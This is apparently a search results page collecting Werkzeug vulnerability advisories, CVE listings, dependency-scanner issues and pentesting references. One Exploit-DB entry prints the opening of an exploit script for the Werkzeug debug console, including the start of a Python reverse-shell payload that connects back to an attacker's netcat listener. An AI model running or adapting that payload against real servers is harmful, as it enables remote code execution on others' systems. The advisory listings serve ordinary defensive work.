Snyk
security.snyk.io › snyk vulnerability database › pip › werkzeug
Werkzeug 2.1.2 vulnerabilities | Snyk
Learn more about known Werkzeug 2.1.2 vulnerabilities and licenses detected.
Snyk
security.snyk.io › snyk vulnerability database › pip › werkzeug
werkzeug 2.2.2 | Snyk
Security vulnerabilities and package health score for pip package werkzeug 2.2.2
Snyk
security.snyk.io › snyk vulnerability database › pip › werkzeug
werkzeug 2.2.1 vulnerabilities | Snyk
Known vulnerabilities in the werkzeug package.
Snyk
security.snyk.io › snyk vulnerability database › pip › werkzeug
Werkzeug 2.0.2 vulnerabilities
Security vulnerabilities and package health score for pip package Werkzeug 2.0.2
GitHub
github.com › sharmas1ddharth › Iris-classification › issues › 30
CVE-2024-34069 (High) detected in Werkzeug-2.2.2-py3-none-any.whl - autoclosed · Issue #30 · sharmas1ddharth/Iris-classification
May 7, 2024 - CVE-2024-34069 - High Severity Vulnerability Vulnerable Library - Werkzeug-2.2.2-py3-none-any.whl The comprehensive WSGI web application library. Library home page: https://files.pythonhosted.org/packages/c8/27/be6ddbcf60115305205de79c29...
Author sharmas1ddharth
Cybersecurity Help
cybersecurity-help.cz › vdb › palletsprojects › werkzeug › 2.2.2
Known Vulnerabilities in Werkzeug 2.2.2
0.2 · 0.1 · Multiple vulnerabilities in Werkzeug31 Oct, 2024 Medium Patched · Denial of service in Werkzeug30 Oct, 2023 Medium Patched · Multiple vulnerabilities in Werkzeug16 Feb, 2023 Medium Patched ·
CVE Details
cvedetails.com › version › 1322616 › Palletsprojects-Werkzeug-2.2.2.html
Palletsprojects Werkzeug 2.2.2 security vulnerabilities, CVEs
This page lists vulnerability statistics for CVEs published in the last ten years, if any, for Palletsprojects » Werkzeug » 2.2.2 .
Cybersecurity Help
cybersecurity-help.cz › vdb › SB2023021673
Multiple vulnerabilities in Werkzeug
February 16, 2023 - This security bulletin contains information about 2 vulnerabilities. ... The vulnerability allows a remote attacker to bypass implemented security restrictions. The vulnerability exists due to insufficient validation of "nameless" cookies. A remote attacker can manipulate cookie values for ...
Snyk
security.snyk.io › snyk vulnerability database › pip
werkzeug | Snyk
As a healthy sign for on-going project maintenance, we found that the GitHub repository had at least 1 pull request or issue interacted with by the community. ... Based on project statistics from the GitHub repository for the PyPI package Werkzeug, we found that it has been starred 6,876 times. ... A good and healthy external contribution signal for Werkzeug project, which invites more than one hundred open source maintainers to collaborate on the repository. ... Known vulnerabilities in the werkzeug package.
HackTricks
book.hacktricks.xyz › home › network services pentesting › pentesting web › werkzeug
Werkzeug / Flask Debug - HackTricks
2 days ago - As observed in this issue, Werkzeug doesn’t close a request with Unicode characters in headers. And as explained in this writeup, this might cause a CL.0 Request Smuggling vulnerability.
Vulmon
vulmon.com › home › search results
werkzeug vulnerabilities and exploits
... Werkzeug is a comprehensive WSGI web application library. The debugger in affected versions of Werkzeug can allow an malicious user to execute code on a developer's machine under some circumstances. This requires the malicious user to get the developer to interact with a dom...
Exploit-DB
exploit-db.com › exploits › 43905
Werkzeug - 'Debug Shell' Command Execution - Multiple remote Exploit
January 28, 2018 - Vulnerable App: #!/usr/bin/env python import requests import sys import re import urllib # usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if len(sys.argv) != 5: print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0]) sys.exit(-1) response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2])) if "Werkzeug " not in response.text: print "[-] Debug is not enabled" sys.exit(-1) # since the application or debugger about python using python for reverse connect cmd = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s
GitHub
github.com › microsoft › cascadia-code › issues › 649
There is a vulnerability in Werkzeug 2.0.1,upgrade recommended · Issue #649 · microsoft/cascadia-code
August 31, 2022 - cascadia-code/requirements.txt Line 198 in 017bde5 werkzeug==2.0.1 CVE-2022-29361 Recommended upgrade version:2.1.1
Author microsoft
CVE Details
cvedetails.com › vulnerability-list › vendor_id-17201 › product_id-41301 › Palletsprojects-Werkzeug.html
Palletsprojects Werkzeug : Security vulnerabilities, CVEs
February 3, 2018 - The issue is fixed in Werkzeug 2.2.3. Source: GitHub, Inc. ... Improper parsing of HTTP requests in Pallets Werkzeug v2.1.0 and below allows attackers to perform HTTP Request Smuggling using a crafted HTTP request with multiple requests included inside the body.
Snyk
security.snyk.io › snyk vulnerability database › pip › werkzeug
werkzeug 2.2.3 | Snyk
Security vulnerabilities and package health score for pip package werkzeug 2.2.3
GitHub
github.com › opensearch-project › data-prepper › issues › 4938
Werkzeug-2.2.3-py3-none-any.whl: 2 vulnerabilities (highest severity is: 8.0) - autoclosed · Issue #4938 · opensearch-project/data-prepper
September 11, 2024 - This vulnerability has been patched in version 3.0.1. ... For more information on CVSS3 Scores, click here. ... The comprehensive WSGI web application library. Library home page: https://files.pythonhosted.org/packages/f6/f8/9da63c1617ae2a1dec2fbf6412f3a0cfe9d4ce029eccbda6e1e4258ca45f/Werkzeug-2.2...
Author opensearch-project
IBM
ibm.com › support › pages › security-bulletin-cookie-parsing-vulnerability-werkzeug-allows-subdomain-cookie-injection-≤-v222-affects-watsonxdata
Security Bulletin: Cookie Parsing Vulnerability in Werkzeug Allows Subdomain Cookie Injection (≤ v2.2.2), affects watsonx.data
April 8, 2026 - A vulnerability in Werkzeug (prior to v2.2.3) allows malicious subdomains to inject crafted "nameless" cookies that are incorrectly parsed as valid cookies. This can cause applications to accept attacker-controlled values, potentially leading to security issues. This can affect watsonx.data.
GitHub
github.com › nexmo-community › opentok-session-lambda-python › issues › 4
Werkzeug-2.2.2-py3-none-any.whl: 2 vulnerabilities (highest severity is: 7.5) · Issue #4 · nexmo-community/opentok-session-lambda-python
February 15, 2023 - The issue is fixed in Werkzeug 2.2.3. ... For more information on CVSS3 Scores, click here. ... Mend: dependency security vulnerabilitySecurity vulnerability detected by MendSecurity vulnerability detected by Mend
Author nexmo-community